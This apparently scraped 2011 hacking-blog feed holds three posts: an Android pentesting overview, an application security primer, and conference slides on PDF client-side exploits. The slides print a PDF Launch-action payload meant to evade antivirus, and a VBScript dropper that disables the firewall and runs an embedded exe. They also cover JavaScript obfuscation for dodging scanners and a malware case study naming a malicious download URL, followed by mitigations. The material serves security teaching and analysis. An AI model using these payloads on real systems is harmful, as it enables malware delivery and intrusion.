hakers.info » Application Security http://localhost:8008/site Hacking made easy... Tue, 18 Oct 2011 06:20:51 +0000 en hourly 1 http://wordpress.org/?v=3.2.1 Android Penetration Testing (PenTesting Android Apps) http://localhost:8008/site/2011/10/android-penetration-testing-pentesting-android-apps/ http://localhost:8008/site/2011/10/android-penetration-testing-pentesting-android-apps/#comments Tue, 18 Oct 2011 05:37:46 +0000 w0rm http://hakers.info/site/?p=256 A report by McAfee for last quarter states that the
‘Count of new Android-specific malware moved to number one, with J2ME (Java Micro Edition), coming in second while suffering only a third as many malware.’ In simple words if you own a Android phone, the chances of it being compromised is 2.5 times more than any other platform.

With industry reporting so many new android exploits and malwares, it is becoming a tedious job for developers to secure their applicaitons. With nearly all IT companies having expertise in Web penetration Testing solutions, they have started building solutions for Mobile Penetration testing. But whats the need of creating a different solution for mobile apps testing? Isn’t it same as web applicaiton testing? If you consider ‘Thin client’ mobile apps, the answer is yes. For thin client mobile apps, penetration testing is almost same as that of Web application testing. But If you consider ‘Thick Client’ or ‘Native Mobile Apps’ which gets installed into the device, the penetration testers have to add some more test cases and the testing environment needs a bit of tweak.
If we compare Web penetration Testing and Mobile PT, what exactly is the difference?? One of the major difference is that the user in the case of Web applicaitons do not have access to the files of application (php,asp,jsp files) whereas in the case of mobile, user has access to the application as it is installed in the device itself. All of the platforms provide some kind of databases for those applicaitons to store data(SqlLite3 in Andoid). In case of web, applicaitons only have privilages to store data temporarily using cookies or cache. One more major drawback with mobile apps is that they can be reversed very easily, whether it’s a dex(android), jar/jad(j2me) or a sis(Symbian).
For Penetration testing of Android Application we have to mainly consider the following things ;-

* Settings up the PT lab/Environment.
In this you will learn about how to setup the test environment using emulator,proxy tools. Using these proxy tools you can force emulator to pass the traffic via a proxy. But this setting only works for browser inside the emulator. For apps to work with proxy you need some different environment setting which is discussed in detail. Click here to read more..

* Using debugging tools like ADB,DDMS.
Using debugging tool like ADB you can run commands on emulator and device itself to perform any kind on action. You can get the shell,view the files stored, databases,install new apps, uninstall apps,pull and push files from the device. DDMS in just a GUI version of ADB. To get more detail about all this click here.

* Reversing Apps.
One of the major drawbacks with Mobile apps is that they can be Reversed. We have many opensource tools for reversing android apps like apktool,baksmali,dex2jar. Click here to read more about this.

Thanks for Watching.. Next article will be on “Deep Dive into Android Malwares”
Njoy!!

]]> http://localhost:8008/site/2011/10/android-penetration-testing-pentesting-android-apps/feed/ 0 Application Security – The Basics http://localhost:8008/site/2011/07/application-security-the-basics/ http://localhost:8008/site/2011/07/application-security-the-basics/#comments Thu, 28 Jul 2011 15:18:04 +0000 w0rm http://hakers.info/site/?p=8 The Institute for Security and Open Methodologies (ISECOM) defines security as “a form of protection where a separation is created between the assets and the threat”.
Security in general has many categories, it can be the security of physical assets like Home, Airport, Infrastructure, or some kind of political security like Human security, national security or computer security which itself  has many categories.


Despite of so many categories for security, two entities are always involved i.e. Asset and Threat. In all scenarios the “asset” has to be protected from the “threat”. Considering our home security, we all lock our doors before going out. Here home is  the asset and threat is the thieves. If the thief is intelligent enough he will gather all our information like at what time the home is usually vacant, how many people live there, or what kind of lock you have applied. This all information will help him to breach your home security.
Similarly in the IT security world, asset may be the data flowing through Network, data stored on a Server, or a Database and threats are the hackers. Same as thieves  the hackers first step is “Information Gathering”.
With Reference to information security we can divide security into categories like Application Security, data security, Network
Security and others. In this article we will focus more on the Basics of Application Security.
‘Wiki’ says Application security encompasses measures taken throughout the application’s life-cycle to prevent exceptions in the security policy of an application or the underlying system (vulnerabilities) through flaws in the design, development, deployment, upgrade, or maintenance of the application. In simple words it comprises the security issues involved in any type of application, including but not limited to java, PHP, C++, and python.

Application Security Trends
The world of internet is growing in tremendous way with IPv4 addresses getting depleted. With growth in number of users, sophistication in technology, the attack vectors have also increased. The graph below shows the study by SANS institute, depicting the growth in the number of attack vectors in first half of year 2010.

Thus, with the increasing sophistication and numbers, of attacks and defense techniques, it has become a cat and mouse game.

The attacks earlier focused on the Operating Systems themselves. However, with a continuous effort and improvement  on the Operating Systems, the vulnerabilities are difficult to find in them, hence resulting in the shift of the fulcrum from the Operating System to the targeted applications. The graph below shows the trend for four popular applications, i.e. Adobe reader, Ms Word, Ms Excel and Ms Power point. If you look at the Adobe, you will see that the vulnerabilities increased drastically for year 2010.

So, it can be said that the two sides of the application security, both good and bad, are in a constant state of evolution.

The malicious guy comes in: THE HACKER
There might be some guys with the malicious intent, who might be looking to compromise your assets. They might be technology geeks, freaks and motivated hackers, attacking your applications just for fun, or for profit. Many times, they are also funded by high profile companies or even governments to target the sensitive data and assets of companies or countries they are in competition. Well known Stuxnet worm and the Aurora attacks are just a few examples; of this; however, there might be many attacks that go unnoticed by the governments and the organizations.

These attackers try to gather as much information as possible for the target. This will involve a lot of searching on the search engines, news groups, job sites, your own site, public forums, social networks like facebook, myspace, orkut etc. A lot of information can be harvested in this manner which can be later misused to breach security. This information includes email ids, date of birth, likings and disliking, girl friends and boyfriends, the software used in the company, location and much more. A popular quote in the hacking world says “Deterministic hackers spend 90% of their time in information gathering phase, rest 10% is spent on the breach”.
Knowing the threats: Build your walls strong enough
The assets need to be secured from the threats. However, for securing the assets, there needs to be a proper knowledge on the boundaries of the application from which input comes. In other simple words, the first rule of security is “the user input MUST not be trusted”. So, for securing the application, the application castle should be strong enough to stop the malicious input on the walls itself. This approach is called as input validation. The other approach is that even if the enemy enters the castle, don’t let them go away, or cripple them. This approach is termed as output validation. These threats can come from any input, which may include a form field, url, cookies, post parameters etc. These inputs should not be trusted in any manner, as this “trust” is what leads to the compromise.

Deeply understanding the threats: Ohh… they are so many
The attack techniques have evolved over time, and there are many ways in which the applications can be compromised. The attacks can be following but not limited to:
•    Cross site scripting
•    SQL injection
•    Buffer overflows
•    Cross site request forgery
•    XPATH injection
•    Format string attacks
•    Heap overflows
•    Redirection attacks
•    Authentication attacks
•    Authorization attacks
•    Canonicalization attacks
•    OS commanding
•    SSI includes
•    Parameter pollution
•    Session based attacks
•    Sniffing
•    Spoofing
•    Phishing
These are only a few examples. Many more exist and the list keeps on getting updated on a regular basis. A simple Google search on “Cross site scripting” or any of these will give you thousands of results, which are enough to explain the vulnerability. There are many security projects(OWASP) and institutes(SANS) working to create freely-available articles, methodologies, documentation, tools, and technologies to provide unbiased, practical, cost-effective information about application. These communities also release a list of the top vulnerabilities at regular interval of time.
Save Me Please
For each of the vulnerabilities, there exist different ways to mitigate them. However, speaking in a generic manner, all the vulnerabilities can be prevented by proper validations, both on input and output. If only one of these is done, this vulnerability can surely be exploited by an attacker. So, it is always better to have a two way defense mechanism, which acts as a double shield to prevent the attacks against the application. When the development of a application is done, an approach that ensure both these validations at the same time should be followed. This is the best possible solution to mitigate the attacks. As far as targeted application like Acrobat Reader or Microsoft applications are concerned the only way to save yourself, is to have updates which are, released by the vendors. Even if you miss a single update your machine is vulnerable to any type of attack. Presently there are many tools to prevent applications from getting hacked but at the end it’s in the hands of the application developer to make his application secure enough and not only checks if all the doors are locked but ensure that every other entry point is also locked and secured.
Conclusion
Thus, we can conclude that the threats on the applications are on a continuous rise, and developers need to be aware of these and educate themselves so as to involve a secure methodology in the lifecycle of the development. These vulnerabilities are large in number, and hence require a thorough study.

]]> http://localhost:8008/site/2011/07/application-security-the-basics/feed/ 2 Client Side Exploits Using PDF http://localhost:8008/site/2011/07/client-side-exploits-using-pdf/ http://localhost:8008/site/2011/07/client-side-exploits-using-pdf/#comments Thu, 28 Jul 2011 15:13:46 +0000 w0rm http://hakers.info/site/?p=5

View more presentations from hakersinfo

Video for embedding exe in a pdf file

Contents of Presentation!!
  1. Client Side Exploits using PDF C0C0N Security & Hacking Conference
  2. Contents About PDF Launch Action Exploits AcroJs Exploits Road Ahead Tools and References
  3. About PDF
    • What is PDF?
    • Incidents in the wild
    • Why pdf attcks?
    • PDF document structure
  4. Potentially Dangerous File / Penetration Document Format
    • Stands for Adobe Portable Document Format
    • Exchange and manipulation of electronic data reliable and platform independent
    • Has become most widespread and used document description format throughout the world
  5. Adobe PDF – As a programming language
    • PDF document is more than a powerful document format
    • Has a complete programming language of its own
    • Dedicated to document creation and manipulation
    • Relatively strong execution features
  6. Adobe PDF – Security Issues
  7. 2010: Still Continuing…
  8. 2010: Still Continuing… March April May June
  9. Incidents in the wild
    • Jun 14 CVE-2010-1297 PDF Adobe 0-Day WEO from [email_address]
    • Jun 20 CVE-2010-1297 PDF Meeting agenda from [email_address]
    • Jun 21 CVE-2010-1297 PDF About the recent US-Japan Economic Relations
    • Jun 21 CVE-2010-1297 PDF Adobe 0-Day About the recent US-Japan Economic Relations – with Poison Ivy
    • Jun 27 CVE-2009-0927 PDF Discussion on cross-strait maritime cooperation
    • Jul 6 CVE-2010-1297 PDF EPA’s Water Sampling Report from spoofed [email_address]
    • Jul 14 CVE-2009-4324 PDF President Obama’s Detrimental Deadlines
  10. The Reign of Zeus:
    • Zeus (also known as Zbot, PRG, Wsnpoem, Gorhax and Kneber) is a Trojan horse that steals banking information by keystroke logging.
    • Found in July 2007 when it was used to steal information from the United States Department of Transportation. It became more widespread in March 2009.
    • In June 2009, security company Prevx discovered that Zeus had compromised over 74,000 FTP accounts on websites of companies like: Bank of America, NASA, Monster, ABC, Oracle, Cisco, Amazon, BusinessWeek
    • ZeuS is sold in the criminal underground as a kit for around $3000-$4000, and is likely the one malware most utilized by criminals specializing in financial fraud. ZeuS has evolved over time and includes a full arsenal of information stealing .
  11. The Reign of Zeus
    • A recent breakthrough in spreading Zeus via PDF files threatens to further the spread of Zeus. The pdf file (detected as Exploit.JS.Pdfka.bui) contained an exploit for the CVE-2010-0188 vulnerability – buffer overflow – manifests itself when the field containing the image is accessed.

    CVE-2010-0188 exploits statistics 2010

  12. Popular in malwaredomainlist.com
  13. Apple iPhone / iPad / iPod Code Execution and Sandbox Bypass
    • VUPEN ID – VUPEN/ADV-2010-1992
    • Release date – 2010-08-03
    • It is caused by a memory corruption error when processing Compact Font Format (CFF) data within a PDF document, which could be exploited by attackers to execute arbitrary code by tricking a user into visiting a specially crafted web page using Mobile Safari
  14. Why PDF
    • Popularity and usability
    • Flexibility, platform independent, rich text
    • Trust level is high on pdf – static piece of information
    • Rich api, easy to exploit / misuse
    • Dominance of Adobe reader, huge scope for attack
  15. PDF document structure
    • The general structure of a PDF file is composed of the following code components: header, body, cross-reference (xref) table, and trailer, as shown in figure 1.
  16. PDF Document Structure PDF Header Objects Trailer Body Cross reference Table
  17. Launch Action
    • Launch Action Api
    • Some Examples
    • Evading Antivirus
    • With embedded EXE
  18. Launch Action Vulnerability
    • A launch action launches an application or opens or prints a document. Following are the action dictionary entries specific to this type of action.
    • ENTRIES
    • S :Name
    • Required) The type of action that this dictionary describes; shall be Launch for a launch action.
    • F: File specification
    • (Required if none of the entries Win , Mac , or Unix is present) The application that shall be launched or the document that shall be opened or printed. If this entry is absent and the conforming reader does not understand any of the alternative entries, it shall do nothing.
    • Win : dictionary
    • (Optional) A dictionary containing Windows-specific launch parameters.
  19. Launch Action Vulnerability
    • PARAMETERS
    • F : byte string
    • (Required) The file name of the application that shall be launched or the document that shall be opened or printed, in standard Windows pathname format. If the name string includes a backslash character (), the backslash shall itself be preceded by a backslash. This value shall be a simple string; it is not a file specification.
    • P : byte string
    • (Optional) A parameter string that shall be passed to the application designated by the F entry. This entry shall be omitted if F designates a document.
  20. Launch Action Vulnerability
    • Open command prompt

    Open website

  21. Launch Action Vulnerability
    • Open notepad.exe
  22. Launch Action Vulnerability
  23. Launch Action Vulnerability
    • Changing the message
  24. Launch Action Vulnerability Confidential Data!! If You are Authorized Click on ‘Open’. Check ‘Do Not Show This Message Again’ to avoid this dialog next time
  25. Launch Action Vulnerability
  26. Launch Action in 9.3.3
  27. Launch Action Vulnerability
  28. Evading Antivirus by Changing the format
    • You can take any other PDF data type and give it a number by wrapping it in "obj" and "endobj". Then later on, when you want to use that chunk of data, you can reference it, by number, with the "R" operator.
    • These two examples are equivalent to Acrobat

    2 0 obj (Hello World) Endobj 3 0 obj << /Example 2 0 R >> Endobj 3 0 obj << /Example (Hello World) >> endobj

  29. Evading Antivirus
    • What You Can Leave Out
      • All Page data
      • All Whitespace, except for End-Of-Line after comments
      • The version number part of %PDF-1.1
      • The %%EOF
      • The xref table
      • And thus also startxref
      • Most Object /Types
    • So what’s actually required?
      • %PDF- anything , but if the file is too confusing for Acrobat, you need at least the first number. Like %PDF-1.
      • A trailer with a /Root dictionary for the Catalog
      • A /Pages dictionary, but this can be empty, just as long as it’s a dictionary type.
      • An /OpenAction if you want to launch your Javascript upon file open.
      • The Javascript Action.
  30. Evading Antivirus
    • %PDF-1.
    • trailer<</Root<</Pages<<>>/OpenAction<</S/Launch/Win<</F(cmd.exe)/P<0A0A0A0A0A0A0A0A4E6F74653A2054686973206973206120736563757265205044462E20546F207669657720746865207365637572656420636F6E74656E7420706C6561736520636C69636B2074686520224F70656E2220627574746F6E2062656C6F772E>>>>>>>>>
  31. Evading Antivirus
  32. POC: Launching an Embedded exe
    • Step 1 : Embed the hex content of the exe in a vbscript which extracts it out to the file system and runs it.
    • Step 2 : Embed that vbscript in the pdf file as comments.
    • Step 3 : Launch cmd.exe and create another script which extracts out the main vbscript from the pdf and run them both.
  33. Step 1 : Embed the hex content of the exe in a vbscript
    • Dim b,bl
    • Function c(d)
    • c=chr(d)
    • End Function
    • b=Array(c(77),c(90),c(144),c(0),c(3),c(0), c(0)….,&quot;&quot;)
    • bl = 3072
    • Set fso = CreateObject(&quot;Scripting.FileSystemObject&quot;)
    • Set f = fso.OpenTextFile(“helpme.exe&quot;, 2, True)
    • For i = 0 To bl
    • f.write(b(i))
    • Next
    • f.close()
    • Set WshShell = WScript.CreateObject(&quot;WScript.Shell&quot;)
    • WshShell.Run &quot;netsh firewall set opmode disable&quot;, 0, True
    • WshShell.Run &quot;helpme.exe&quot;, 0, False
    • WshShell.Run &quot;taskkill /IM cmd.exe /F&quot;, 0, False

    Hex content of the exe as a character array

  34. Step 2 : Embed the vbscript in the pdf file as comments
    • %’SS
    • %Dim b,bl;Set WshShell = Function c(d);c=chr(d);End Function;b=Array(c(77),c(90),c(144),c(0),…..,&quot;&quot;);bl = 3072;Set fso = CreateObject(&quot;Scripting.FileSystemObject&quot;);Set f = fso.OpenTextFile(&quot;helpme.exe&quot;, 2, True);For i = 0 To bl;f.write(b(i));Next;f.close(); Set WshShell = WScript.CreateObject(&quot;WScript.Shell&quot;) ;WshShell.Run &quot;netsh firewall set opmode disable&quot;, 0, True;WshShell.Run &quot;helpme.exe&quot;, 0, False;WshShell.Run &quot;taskkill /IM cmd.exe /F&quot;, 0, False
    • %’EE
    • 6 0 obj
    • [/PDF /Text]
    • endobj
  35. Step 3 : Launch cmd.exe and create another script
    • /c echo Set fso=CreateObject(&quot;Scripting.FileSystemObject&quot;) > execute.vbs && echo Set f=fso.OpenTextFile(&quot;EmbeddedExePoC.pdf&quot;, 1, True) >> execute.vbs && echo pf=f.ReadAll >> execute.vbs && echo s=InStr(pf,&quot;’SS&quot;) >> execute.vbs && echo e=InStr(pf,&quot;’EE&quot;) >> execute.vbs && echo s=Mid(pf,s,e-s) >> execute.vbs && echo Set z=fso.OpenTextFile(&quot;toexecute.vbs&quot;, 2, True) >> execute.vbs && echo s = Replace(s,&quot;%&quot;,&quot;&quot;) >> execute.vbs && echo s = Replace(s,&quot;;&quot;,vbcrlf) >> execute.vbs && echo z.Write(s) >> execute.vbs && execute.vbs && toexecute.vbs
  36. Generated VBScript
    • Set fso=CreateObject(&quot;Scripting.FileSystemObject&quot;)
    • Set f=fso.OpenTextFile(&quot;EmbeddedExePoC.pdf&quot;, 1, True)
    • pf=f.ReadAll
    • s=InStr(pf,&quot;’SS&quot;)
    • e=InStr(pf,&quot;’EE&quot;)
    • s=Mid(pf,s,e-s)
    • Set z=fso.OpenTextFile(&quot;toexecute.vbs&quot;, 2, True)
    • s = Replace(s,&quot;%&quot;,&quot;&quot;)
    • s = Replace(s,&quot;;&quot;,vbcrlf)
    • z.Write(s)
  37. AcroJS
    • AcroJs Api
    • Vulnerable Api’s
    • Obfuscation Techniques
    • Case Study
  38. AcroJS
    • Acrobat JavaScript is the cross-platform scripting language of the Adobe® Acrobat® family of products.
    • Through JavaScript extensions, the viewer application and its plug-ins expose much of their functionality to document authors, form designers, and plug-in developers.
    • This functionality includes the following features,
      • Processing forms within the document
      • Batch processing collections of PDF documents
      • Developing and maintaining online collaboration schemes
      • Communicating with local databases
      • Controlling multimedia events
  39. JavaScript Actions
    • A JavaScript action causes a script to be compiled and executed by the JavaScript interpreter.
    • Depending on the nature of the script, various interactive form fields in the document may update their values or change their visual ap­pearances.
    • PARAMETERS
    • /S
    • Type – name
    • (Required) The type of action that this dictionary describes; must be JavaScript for a JavaScript action.
    • /JS
    • Type – text string or text stream
    • (Required) A text string or text stream containing the JavaScript script to be exe­cuted.
  40. Acrojs examples launchURL Alertbox
  41. Acrojs examples
  42. Acrojs examples
  43. Vulnerable APIs
    • getIcons() [CVE-2009-0927]
      • Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9 before 9.1, 8 before 8.1.3 , and 7 before 7.1.1 allows remote attackers to execute arbitrary code via a crafted argument to the getIcon method of a Collab object, a different vulnerability than CVE-2009-0658.
    • Util.printf() [CVE-2008-2992][CVE-2008-1104]
      • Stack-based buffer overflow in Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string argument, a related issue to CVE-2008-1104.
      • Stack-based buffer overflow in Foxit Reader before 2.3 build 2912 allows user-assisted remote attackers to execute arbitrary code via a crafted PDF file, related to the util.printf JavaScript function and floating point specifiers in format strings.
  44. Vulnerable APIs
    • getAnnots() [CVE-2009-1492]
      • The getAnnots Doc method in the JavaScript API in Adobe Reader and Acrobat 9.1, 8.1.4, 7.1.1, and earlier allows remote attackers to cause a denial of service (memory corruption) or execute arbitrary code via a PDF file that contains an annotation, and has an OpenAction entry with JavaScript code that calls this method with crafted integer arguments.
    • customDictionaryOpen() [CVE-2009-1493]
      • The customDictionaryOpen spell method in the JavaScript API in Adobe Reader 9.1, 8.1.4, 7.1.1, and earlier on Linux and UNIX allows remote attackers to cause a denial of service (memory corruption) or execute arbitrary code via a PDF file that triggers a call to this method with a long string in the second argument.
  45. Vulnerable APIs
    • Doc.media.newPlayer [CVE-2009-4324]
      • Use-after-free vulnerability in the Doc.media.newPlayer method in Multimedia.api in Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, allows remote attackers to execute arbitrary code via a crafted PDF file using ZLib compressed streams, as exploited in the wild in December 2009.
    • Collab.collectEmailInfo [CVE-2007-5659]
      • Multiple buffer overflows in Adobe Reader and Acrobat 8.1.1 and earlier allow remote attackers to execute arbitrary code via a PDF file with long arguments to unspecified JavaScript methods. NOTE: this issue might be subsumed by CVE-2008-0655.
  46. Obfuscation Techniques
    • Why?
      • To make analysis more difficult
      • To avoid detection by virus scanners
    • Ways?
      • Using javascript Obfuscation
      • Using Pdf Obfuscations(Filters)
  47. Javascript Obfuscations : Unlearn Coding Ethics
  48. Distorting format Normal Code Obfuscated Code function execute(data, time) { Timelag=5000; if (time > Timelag) { // some code } } function overflow(hex, loop) { for (i=0;i<loop;i++) { hex = hex + hex; } } function overflow(hex, loop){for (i=0;i<loop;i++){hex = hex + hex;}} function overflow(hex, loop) {for i=0;i<loop;i++){hex = hex + hex;} }
  49. Obfuscating Identifiers Normal Code Obfuscated Code function execute(data, time) { Timelag=5000; if (time > Timelag) { // some code } } function overflow(hex, loop) { for (i=0;i<loop;i++) { hex = hex + hex; } } function aeiou(lIlIIlI, O0OOOO0OO000OO) { WWMWMMWMWMWMW=5000; if (O0OOOO0OO000OO > WWMWMWMWMWMW) { // some code } } function aimpq(xxwmnnx, pqrtxw) { for (dqweaa=0; dqweaa < pqrtxw; dqweaa ++) { xxwmnnx = xxwmnnx + xxwmnnx;; } }
  50. Obfuscating Identifiers – Even Worse Differentiating with number of underscore characters function _____(____,__________) { ______________=5000; if (__________>______________) { // some code } } function ___(_______, ______) { for(________________=0; ________________<______; ________________ ++) { _______ = _______ + _______; } }
  51. Obfuscating Identifiers – Even Worse Differentiating with number of underscore characters function _____(____,__________){______________=5000;if (__________>______________){// some code}}function ___(_______, ______){for(________________=0; ________________<______; ________________ ++){_______ = _______ + _______;}}
  52. Chain of Eval Normal Code Obfuscated code app.alert(“c0c0n”) func=&quot;eval&quot;; one=’app.alert(&quot;c0c0n&quot;)’; two=eval(one); three=eval(two); eval(func(three));
  53. Splitting Javascript Normal code Obfuscated Code app.alert(“hello world”); Rt=“);”; Td=“ert(”hel”; Ab=“ap”; Qw=“ld””; Kg=“p.al”; Gh=“lo wor”; Eval(“hh=Ab+Kg+Td+Gh+Qw+Rt”); Eval(hh);
  54. Callee Trick Function accesses its own source and uses it as a key to decrypt code or data function decrypt(cypher) { var key = arguments.callee.toString(); for (var i = 0; i < cypher.length; i++) { plain = key.charCodeAt(i) ^ cypher.charCodeAt(i); } … }
  55. Pdf obfuscations
    • Using Filters for streams.
    • Most common encoding techniques -
      • ASCIIHEXDecode,
      • ASCII85Decode,
      • LZWDecode,
      • FlateDecode,
      • RunLengthDecode
  56. Case Study
    • Malware found from – www.malwaredomainlist.com
    • File link www.bigiqwars.ru/ppp/exp/pdf.php?user=admin&pdf_acces=on
    • Added on – 29 th july 2010
  57. Virus total Reports 5/42(11.90%)
    • Analysis
  59. STEP-1
    • WGET www.bigiqwars.ru/ppp/exp/pdf.php?user=admin&pdf_acces=on
  60. STEP-2
    • Behavioral Analysis
    • Environment
    • By using vm image
    • Filemon,Processmon,Regmon,TCPView
    • Results
    • Under Process ‘AcroRD32.exe’ Was trying to connect to remote site http://bigiqwars.ru/ppp/exe.php?spl=PDF (newPlayer)&user=admin&exe_acces=on
  61. STEP-3
    • Pdfid.py
  62. STEP-4
    • Static/Code Analysis
  63. Word Editor
  64. Decoded the script
  65. Formatted using jsbeautifier.org
  66. Replacing with meaningful identifiers and removing unnecessary comments
    • Replacing ‘X’ from parameter
  69. Shellcode Analysis Connecting to… http://bigiqwars.ru/ppp/exe.php?spl=PDF (newPlayer)&user=admin&exe_acces=on
  70. Road Ahead
    • Mitigations
    • Adobe’s security Measures
    • Future Exploit methods
  71. How can we protect ourselves
    • Enable automatic updates: it sounds simple, but you will need to turn it on in the software settings to make it happen by default.
    • Disable PDF browser integration: most browsers will open PDFs without asking. An infected PDF will deliver its payload without warning, hiding in the background.
    • Always install the latest patch/update, even for older Adobe product versions.
    • Disable Javascript
    • Uncheck ‘Allow non-PDF gile attachments with external applications’ to prevent launch action vulnerability.
    • PDF alternatives such as Foxit are worthwhile, as long as auto updates are turned on, however alternative programs are just as vulnerable to malware as they gain popularity.
  72. Road Ahead
    • Focus Less on javascript exploits
    • Attackers focusing more on embedded objects inside pdf i.e flash
    • Adobe to introduce sandboxing to limit Reader exploits
  73. Tools And References
  74. Tools used
    • Malzilla
    • Mozilla addon
      • javascript deobfescator by Wladimir Palant
    • Vmware Player
    • Sysinternal tools
      • Processmon,filemon,regmon,tcpview
    • WinHex
    • HexEdit
  75. Thank you
    • Hakers.info
]]> http://localhost:8008/site/2011/07/client-side-exploits-using-pdf/feed/ 0